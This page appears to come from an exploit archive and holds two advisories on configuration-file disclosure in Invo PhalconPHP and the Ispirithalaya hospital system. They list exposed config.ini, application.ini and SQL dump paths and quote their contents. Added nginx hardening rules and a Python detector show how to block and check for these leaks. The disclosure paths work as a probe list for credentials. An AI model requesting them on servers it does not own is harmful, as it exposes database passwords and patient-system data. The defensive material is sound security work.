MD5 | 5379b2ec6c162d2b54b475cb320f4596

####################################################################

# Exploit Title : Invo PhalconPHP 1.x Database Config Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/02/2019
# Vendor Homepage : phalconphp.com
# Software Download Link : github.com/phalcon/invo/archive/master.zip
# Software Information Link : invo.phalconphp.com
# Software Affected Version : Free Version and 1.x
# Software Technical Requirements :
PHP => 5.4 and MySQL => 5.1.5
Apache Web Server with mod_rewrite enabled or Nginx Web Server
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-16 [ Configuration ] ~ CWE-200 [ Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
Phalcon PHP is a web framework delivered as a C extension, providing high performance and lower resource consumption.

####################################################################

# Impact :
***********
The Invo PhalconPHP configuration file may disclose sensitive information to remote attackers. Invo PhalconPHP stores its configuration in /app/config/config.ini and its database schema in /schemas/invo.sql. HTTP requests consisting of a single character will cause the software to disclose sensitive configuration information, including the database password used by the administrative web interface. These files are installed, by default, with world-readable and possibly world-writeable permissions. This may have potentially serious consequences, as the configuration file also stores password information in plain text. The issue occurs because access controls on configuration files are not properly set. An attacker can exploit this issue to retrieve potentially sensitive information simply by requesting the configuration file via URL, which may aid in further attacks.

####################################################################

# Database Configuration File Disclosure Exploit :
*******************************************
/app/config/config.ini

[database]
adapter = Mysql
host = localhost
username = root
password =
dbname = invo
charset = utf8

[application]
controllersDir = app/controllers/
modelsDir = app/models/
viewsDir = app/views/
pluginsDir = app/plugins/
formsDir = app/forms/
libraryDir = app/library/
baseUri = /

# Database Disclosure Exploit :
***************************
/schemas/invo.sql

-- MySQL dump 10.13 Distrib 5.1.50, for apple-darwin10.4.0 (i386)
--
-- Host: 127.0.0.1 Database: invo
-- ------------------------------------------------------
-- Server version 5.1.50

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
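The three advisories on this page share one root cause: configuration files and SQL dumps sit inside the document root and are served as static files. As an added mitigation example (not from the advisories, and not shipped by the Invo, F3 CMS or Ispirithalaya projects), the nginx server block below refuses to serve the directories and file extensions named in the advisories. The server name, document root, PHP-FPM socket and the Phalcon-style try_files rewrite are assumptions for the sake of a complete config; adjust them to the deployment.

```nginx
# Added hardening example for the config-disclosure issues above.
# Assumed values: app.example, /var/www/invo, the php-fpm socket path.
server {
    listen 80;
    server_name app.example;
    root /var/www/invo;
    index index.php;

    # Directories named in the advisories: answer 404 rather than 403 so the
    # response does not confirm that the file exists. A prefix match with ^~
    # wins over the regex locations below, so no PHP handler can reach them.
    location ^~ /app/config/          { return 404; }
    location ^~ /schemas/             { return 404; }
    location ^~ /data/db/             { return 404; }
    location ^~ /application/configs/ { return 404; }

    # Belt and braces: never serve config or dump file types from anywhere
    # under the document root, whatever directory they end up in.
    location ~* \.(ini|sql|env|log|bak)$ { return 404; }

    # Phalcon-style front controller (assumed rewrite; adjust for the app).
    location / {
        try_files $uri $uri/ /index.php?_url=$uri&$args;
    }

    location ~ \.php$ {
        fastcgi_pass unix:/run/php/php-fpm.sock;   # assumed socket path
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    }
}
```

The location rules are a backstop. The durable fix is to keep config.ini, application.ini and the SQL dumps outside the document root entirely, set a real database password instead of the empty root password shown in the Invo config.ini, and make the files readable only by the web server's user rather than world-readable.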

Ispirithalaya Hospital Management System 0.1.2 Database Configuration Disclosure


Ispirithalaya Hospital Management System version 0.1.2 suffers from a database configuration file disclosure vulnerability.


MD5 | 61995c241b7a3d7f87fd7ae29a061a17

####################################################################

# Exploit Title : Ispirithalaya Hospital Management System 0.1.2 Database Config Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/02/2019
# Vendor Homepage : freeehospital.com
# Software Download Link : sourceforge.net/projects/ispirithalaya/files/latest/download
# Software Information Link : sourceforge.net/projects/ispirithalaya/
# Software Version : 0.1.2
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-16 [ Configuration ] ~ CWE-200 [ Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
The Ispirithalaya system provides e-channeling, checking, lab tests and reservations. It is written with the Zend PHP framework and a MySQL database. Doctors and patients can log in to the system and chat. It has payment gateway integration.

####################################################################

# Impact :
***********
The Ispirithalaya Hospital Management System 0.1.2 [ and other versions ] configuration file may disclose sensitive information to remote attackers. Ispirithalaya Hospital Management System 0.1.2 stores its configuration in /application/configs/application.ini. HTTP requests consisting of a single character will cause the software to disclose sensitive configuration information, including the database password used by the administrative web interface. This file is installed, by default, with world-readable and possibly world-writeable permissions. This may have potentially serious consequences, as the configuration file also stores password information in plain text. The issue occurs because access controls on configuration files are not properly set. An attacker can exploit this issue to retrieve potentially sensitive information simply by requesting the configuration file via URL, which may aid in further attacks.

####################################################################

# Database Config Disclosure Exploit :
*********************************
/application/configs/application.ini

resources.db.adapter =
resources.db.params.host =
resources.db.params.username =
resources.db.params.password =
resources.db.params.dbname =

/data/db/ispirithalaya-data.sql

-- phpMyAdmin SQL Dump
-- version 3.3.9
-- phpmyadmin.net
--
-- Host: localhost
-- Generation Time: Oct 18, 2011 at 05:21 PM
-- Server version: 5.5.8
-- PHP Version: 5.3.5

/data/db/ispirithalaya.sql

-- phpMyAdmin SQL Dump
-- version 3.3.10deb1
-- phpmyadmin.net
--
-- Host: localhost
-- Generation Time: Oct 15, 2011 at 11:31 AM
-- Server version: 5.1.54
-- PHP Version: 5.3.5-1ubuntu7.2

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
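All three advisories (F3 CMS, Invo PhalconPHP and Ispirithalaya) come down to the same check: is a config file or SQL dump being served verbatim over HTTP? The script below is an added example for verifying your own deployment after hardening; it is not code from the advisories or from any of the three projects. It classifies a response body by the markers visible in the quoted files (an `[database]` INI section, `password =` / `resources.db.params.password =` keys, `-- MySQL dump` / `-- phpMyAdmin SQL Dump` headers, SQL statements) and reports which of the advisory paths still come back as readable config. The HTTP client is injected so the demo runs offline against constructed sample bodies; `http_fetch`, `fake_fetch`, the sample strings and `http://app.example` are all assumptions made here.

```python
"""Detect leaked configuration files and SQL dumps in HTTP responses.

Added example for the config-disclosure advisories on this page; it is not
code from the advisories or from the F3 CMS, Invo or Ispirithalaya projects.
The sample response bodies below are constructed for the demonstration.
"""
import re
import urllib.request
from urllib.error import HTTPError, URLError
from urllib.parse import urlsplit

# File paths named in the advisories above.
SENSITIVE_PATHS = [
    "/data/db/sql/audit-archive.sql",
    "/data/db/sql/create.sql",
    "/data/db/sql/phinx.sql",
    "/app/config/config.ini",
    "/schemas/invo.sql",
    "/application/configs/application.ini",
    "/data/db/ispirithalaya-data.sql",
    "/data/db/ispirithalaya.sql",
]

# Markers that distinguish a raw config file or SQL dump from an ordinary
# application page or error document. [ \t] rather than \s keeps every match
# on a single line; \s would swallow the newline and read the next line as
# the value of an empty "password =" key.
_INI_SECTION = re.compile(r"^[ \t]*\[(database|application)\][ \t]*$", re.M)
_CRED_KEY = re.compile(
    r"^[ \t]*(?:resources\.db\.params\.)?(password|username)[ \t]*=[ \t]*(.*)$",
    re.M | re.I,
)
_SQL_DUMP = re.compile(r"^--[ \t]*(?:MySQL dump|phpMyAdmin SQL Dump)", re.M)
_SQL_STMT = re.compile(r"^[ \t]*(?:CREATE TABLE|INSERT INTO|DROP TABLE)\b", re.M | re.I)


def classify_body(body: str) -> list:
    """Return findings for one response body; an empty list means it looks benign."""
    findings = []
    if _INI_SECTION.search(body):
        findings.append("ini-config")
    for m in _CRED_KEY.finditer(body):
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "password":
            findings.append("empty-db-password" if value == "" else "plaintext-db-password")
        else:
            findings.append("db-username")
    if _SQL_DUMP.search(body):
        findings.append("sql-dump-header")
    if _SQL_STMT.search(body):
        findings.append("sql-statements")
    return findings


def check_paths(base_url: str, paths, fetch) -> dict:
    """Map each path served with HTTP 200 and config/dump content to its findings.

    fetch(url) must return (status_code, body_text). Injecting it keeps the
    check testable offline and lets you plug in your own HTTP client.
    """
    exposed = {}
    for path in paths:
        status, body = fetch(base_url.rstrip("/") + path)
        if status == 200:
            findings = classify_body(body)
            if findings:
                exposed[path] = findings
    return exposed


def http_fetch(url: str, timeout: float = 10.0):
    """Minimal urllib-based fetcher for checking your own deployment (assumed helper)."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read(1 << 20).decode("utf-8", errors="replace")
    except HTTPError as e:
        return e.code, ""
    except URLError:
        return 0, ""


# Constructed samples: the config.ini shape quoted in the Invo advisory (with
# its empty root password) and a dump header like the ones quoted above.
SAMPLE_INI = "[database]\nadapter = Mysql\nhost = localhost\nusername = root\npassword =\ndbname = invo\ncharset = utf8\n"
SAMPLE_SQL = "-- MySQL dump 10.13  Distrib 5.1.50\n--\n-- Host: 127.0.0.1    Database: invo\nCREATE TABLE `users` (id INT);\n"
SAMPLE_HTML = "<html><body><h1>Welcome</h1></body></html>"


def fake_fetch(url: str):
    """Offline stand-in for http_fetch that serves only the constructed samples."""
    served = {
        "/app/config/config.ini": SAMPLE_INI,
        "/schemas/invo.sql": SAMPLE_SQL,
        "/": SAMPLE_HTML,
    }
    path = urlsplit(url).path
    return (200, served[path]) if path in served else (404, "Not Found")


if __name__ == "__main__":
    # Swap fake_fetch for http_fetch to run against a real base URL you own.
    for p, f in check_paths("http://app.example", SENSITIVE_PATHS, fake_fetch).items():
        print(p, "->", ", ".join(f))
```

Run against the constructed fetcher, the two Invo paths are reported (the config with an empty root password, the schema with a dump header and a CREATE TABLE), while the remaining advisory paths return 404 and are ignored. A 200 with an HTML body also produces no finding, so a catch-all front controller that answers every URL with the application page does not register as a leak.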
